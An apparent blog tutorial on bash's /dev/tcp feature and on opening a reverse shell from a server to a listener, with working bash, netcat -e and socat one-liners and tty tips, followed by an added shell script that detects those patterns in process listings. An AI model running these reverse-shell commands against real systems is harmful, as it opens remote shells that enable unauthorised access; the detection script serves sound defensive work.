Reverse shell is fun
Need SSH access, but something is going wrong? Read on!
Sometimes I need a shell right now, but in some cases it's impossible (no SSH on the hosting, or something like that).
Happily, bash has a built-in network pseudo-interface, /dev/tcp and /dev/udp (enabled by default on most distros). So we can use php, ruby, etc. on the server to create a reverse connection to a listener and get shell access.
/dev/tcp
To use it, we redirect input from /dev/tcp/host/port (or output to it) just like any other file.
Simple example:
user@host ~ $ cat < /dev/tcp/time.nist.gov/13
57103 15-03-22 23:54:14 50 0 0 587.5 UTC(NIST) *
Send an HTTP request:
user@host ~ $ exec 3<> /dev/tcp/roundside.com/80
user@host ~ $ echo -e "GET / HTTP/1.1\nHost: roundside.com\nConnection: close\n\n" >&3
user@host ~ $ cat <&3
HTTP/1.1 200 OK
Server: nginx/1.6.1
Date: Mon, 23 Mar 2015 00:06:00 GMT
Content-Type: text/html
Content-Length: 11517
Connection: close
Last-Modified: Tue, 09 Dec 2014 17:40:10 GMT
ETag: "6587d2-2cfd-509cc08e7aef5"
Accept-Ranges: bytes
Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""
...
This is a little different from the previous one. As we need to send data first, we create file descriptor 3 for reading and writing and bind it to /dev/tcp/address/port:
exec 3<> /dev/tcp/roundside.com/80
A beautiful article about redirections is the catonmat.net post in the refs below.
Next, create the HTTP request header and write it to file descriptor 3 to send it:
echo -e "GET / HTTP/1.1\nHost: roundside.com\nConnection: close\n\n" >&3
And last, read the response:
cat <&3
Now, let's get bash over TCP
/dev/tcp can only make outgoing connections, so netcat or socat is needed on the listener side.
Create a listener:
user@listener ~: nc -l -p 1413
And connect to it from the target:
user@target ~ $ /bin/bash -c "/bin/bash -i > /dev/tcp/listener_address/1413 0>&1 2>&1"
Done, now we have a remote shell using bash only:
user@listener ~: nc -l -p 1413
user@target ~ $
In this example bash runs in interactive mode,
/bin/bash -i
(bash will source ~/.bashrc or the default bash config file, so we get a slightly nicer shell), sends all its stdout to the listener,
/bin/bash -i > /dev/tcp/listener_address/1413
and everything sent from the listener is executed by bash and the output is redirected back to the listener (stderr is also redirected, which is important):
/bin/bash -i > /dev/tcp/listener_address/1413 0>&1 2>&1
More elegantly:
/bin/bash -c "bash -i &> /dev/tcp/listener_address/1413 0>&1"
&> or >& redirects both stdout and stderr to the specified address.
Of course, netcat with the '-e' parameter can also be used to execute bash:
user@target ~ $ nc listener_address 1413 -e '/bin/bash'
But there is a problem.
Key shortcuts and ncurses-based programs will not work correctly. We need a proper tty now, and it's socat time!
Socat is like netcat, but with extremely powerful features (statically linked builds are available for Linux and for FreeBSD).
Create a listener:
user@listener ~: socat -,raw,echo=0 tcp-listen:1413
And connect from the target:
user@target ~ $ socat tcp:listener_address:1413 exec:"bash -i",pty,stderr,setsid,sigint,sane
Now we can play ninvaders, use htop, mc, vim and any other CLI stuff :)
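All three connection styles shown above (bash writing to /dev/tcp, netcat with -e, socat handing the connection to a program with a pty) leave a recognisable command line behind, which is what a defender looks for in process listings, auditd EXECVE records or shell history. The script below is an added example, not part of the original post: it reads lines in the form `PID USER ARGS` (as produced by `ps -eo pid,user,args`, header line dropped) and tags the ones that match those patterns. The sample process list embedded in it is constructed; 203.0.113.5 is a documentation address, not a real listener.

```sh
#!/bin/sh
# Added example (not from the original post): flag process command lines that
# look like the reverse-shell techniques described in the post, so a defender
# can spot them in `ps` output, auditd EXECVE records or shell history.
# Input format assumed here: one process per line, "PID USER ARGS".

# Constructed sample input (not real hosts). Three lines should be flagged;
# the rsync, port-scan, plain socat and php-fpm lines are benign look-alikes.
SAMPLE_PROCS='4120 www-data /bin/bash -c /bin/bash -i > /dev/tcp/203.0.113.5/1413 0>&1 2>&1
4133 www-data nc 203.0.113.5 1413 -e /bin/bash
4150 www-data socat tcp:203.0.113.5:1413 exec:bash -i,pty,stderr,setsid,sigint,sane
4201 backup rsync -e ssh -a /srv/ backup@10.0.0.2:/srv/
4210 alice nc -zv 10.0.0.7 22
4222 alice socat - tcp:10.0.0.7:80
4230 www-data php-fpm: pool www'

# Classify one command line; prints a tag, or nothing if it looks benign.
classify_cmdline() {
  line=$1
  # bash network redirection: any redirect through /dev/tcp or /dev/udp
  if printf '%s\n' "$line" | grep -Eq '/dev/(tcp|udp)/'; then
    echo bash-net-redirect
  # netcat family told to run a program (-e or -c) after connecting;
  # the leading boundary keeps "rsync -e ssh" from matching as "nc"
  elif printf '%s\n' "$line" | grep -Eq '(^|[[:space:]/])(nc|netcat|ncat)[[:space:]].*[[:space:]]-[ec][[:space:]]'; then
    echo netcat-exec
  # socat handing the connection to a program with a pty attached
  elif printf '%s\n' "$line" | grep -Eq '(^|[[:space:]/])socat[[:space:]].*(exec|system):.*pty'; then
    echo socat-pty
  fi
}

# Read "PID USER ARGS" lines from stdin; print "TAG PID USER ARGS" per hit.
flag_reverse_shells() {
  while IFS= read -r line; do
    tag=$(classify_cmdline "$line")
    if [ -n "$tag" ]; then
      printf '%s %s\n' "$tag" "$line"
    fi
  done
}

# Number of flagged lines in the constructed sample.
count_flagged() {
  printf '%s\n' "$SAMPLE_PROCS" | flag_reverse_shells | wc -l | tr -d ' '
}

# Usage: run stand-alone to print the flagged sample lines, or pipe real
# `ps -eo pid,user,args` output (minus the header) into flag_reverse_shells.
printf '%s\n' "$SAMPLE_PROCS" | flag_reverse_shells
```

The patterns are deliberately narrow (they key on the redirect path, the exec flag and the pty option rather than on the tool names alone) so that routine uses of nc, socat and rsync do not drown the real hits; a socat listener without exec: or a port scan with nc -zv is left alone.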
PS: don't forget to adjust the terminal size after getting the reverse shell.
Check the actual size:
echo $LINES,$COLUMNS
53,159
and export it after getting the shell:
export LINES=53;export COLUMNS=159
All for now.
Want more?
See the socat man page and its examples page (first ref below).
Refs:
https://stuff.mit.edu/afs/sipb/machine/penguin-lust/src/socat-1.7.1.2/EXAMPLES
http://www.catonmat.net/blog/bash-one-liners-explained-part-three/
http://www.gnucitizen.org/blog/reverse-shell-with-bash/
http://blog.rootshell.ir/2010/08/get-your-interactive-reverse-shell-on-a-webhost/